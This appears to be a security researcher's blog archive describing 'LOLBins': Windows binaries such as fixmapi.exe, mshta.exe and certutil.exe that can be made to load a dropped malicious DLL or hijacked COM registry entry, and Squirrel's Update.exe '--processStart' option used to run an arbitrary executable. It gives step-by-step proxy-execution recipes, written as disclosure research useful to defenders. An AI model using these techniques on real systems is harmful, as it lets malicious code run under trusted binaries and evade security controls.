Author Archives: adam

A few more LOLBins…

Posted on by

There are a few more quick wins for loading DLLs using native .exe files from Windows 10… courtesy of good ol’ LoadLibraryA e.g.:

  • fixmapi.exe
    • Copy c:\WINDOWS\System32\fixmapi.exe to your folder
    • Drop malicious mapistub.dll there
    • Run fixmapi.exe
  • mshta.exe
    • Copy c:\WINDOWS\System32\mshta.exe to your folder
    • Drop malicious WLDP.DLL there
    • Run mshta.exe
  • mshta.exe
    • Temporary change HKCR\clsid\
      {25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32
      to point to malicious DLL
    • Run mshta.exe
    • Restore the Registry entry

This is obviously not the end.

There are so many potentials that it gets really boring to enumerate all this stuff:

  • Apart from LoadLibraryA, there is LoadLibraryW which is very prevalent.
  • There are cases of LoadLibraryExA and LoadLibraryExW that still use parameters that allow abuse.
  • There are also functions that allow environment variables to resolve paths for libraries they load – bad choice.
  • Pretty much every single .exe that is dependent on statically linked DLLs that are not on the KnownDLL list may be used as a lolbin e.g.
    • certutil.exe relies on certcli.dll
      • certcli.dll in turn relies on certca.dll
        so you can just produce DLLs that include all the exported functions like the original ones and let the certutil.exe load them.
  • And there are non-OS binaries that are highly prevalent in various environments that offer lots of opportunities for side-loading or proxy execution.

The possibilities are almost endless. Unless I find something really new/cool I won’t be posting about Lolbins anymore as at this stage I am bored with it 🙂

Squirrel as a Lolbin

Posted on by

Squirrel is an installation and update framework for Windows desktop apps. It is used by many applications (e.g. slack) and as a result can be found on many systems. Like other installers I described previously Squirrel includes a bunch of components / routines that can be used to simplify typical installation tasks. This makes it a good candidate for a lolbin.

The simplest way to use Squirrel component as a lolbin is to copy a test file to the application directory of the installed application, and then run update.exe with a ‘processStart’ command line argument.

I will use Slack as an example, but it can be any application really.

  • Go to c:\Users\<user>\AppData\Local\slack\
  • Find the folder where application files are e.g. app-3.3.0\
  • Drop your test.exe there
  • Now run ‘Update.exe –processStart test.exe’

That’s it. The test.exe should be executed.

There are alternatives: one could prepare a nuget installation package and use the update process to download it from the internet and run it.

Below is a full list of arguments that the tool supports (including the semi-documented ones i.e. these that are not listed when –help is used as a command line argument):

Commands
--install=VALUE - Install the app whose package is in the specified directory
--uninstall - Uninstall the app the same dir as Update.exe 
--download=VALUE - Download the releases specified by the URL and write new results to stdout as JSON
--checkForUpdate=VALUE - Check for one available update and writes new results to stdout as JSON
--update=VALUE - Update the application to the latest remote version specified by URL
--releasify=VALUE - Update or generate a releases directory with a given NuGet package
--createShortcut=VALUE - Create a shortcut for the given executable name 
--removeShortcut=VALUE - Remove a shortcut for the given executable name
--updateSelf=VALUE - Copy the currently executing Update.exe into the default location
--processStart=VALUE - Start an executable in the latest version of the app package
--processStartAndWait=VALUE - Start an executable in the latest version of the app package
Options:
-h, -?, --help - Display Help and exit
-r, --releaseDir=VALUE- Path to a release directory to use with releasify
-p, --packagesDir=VALUE - Path to the NuGet Packages directory for C# apps
--bootstrapperExe=VALUE - Path to the Setup.exe to use as a template
-g, --loadingGif=VALUE - Path to an animated GIF to be displayed during installation
-i, --icon=VALUE - Path to an ICO file that will be used for icon shortcuts
--setupIcon=VALUE - Path to an ICO file that will be used for the Setup executable's icon
-n, --signWithParams=VALUE - Sign the installer via SignTool.exe with the parameters given
-b, --baseUrl=VALUE - Provides a base URL to prefix the RELEASES file packages with
-a, --process-start-args=VALUE - Arguments that will be used when starting executable
-s, --silent - Silent install
-l, --shortcut-locations=VALUE - Comma-separated string of shortcut locations, e.g. 'Desktop,StartMenu'
--no-msi - Don't generate an MSI package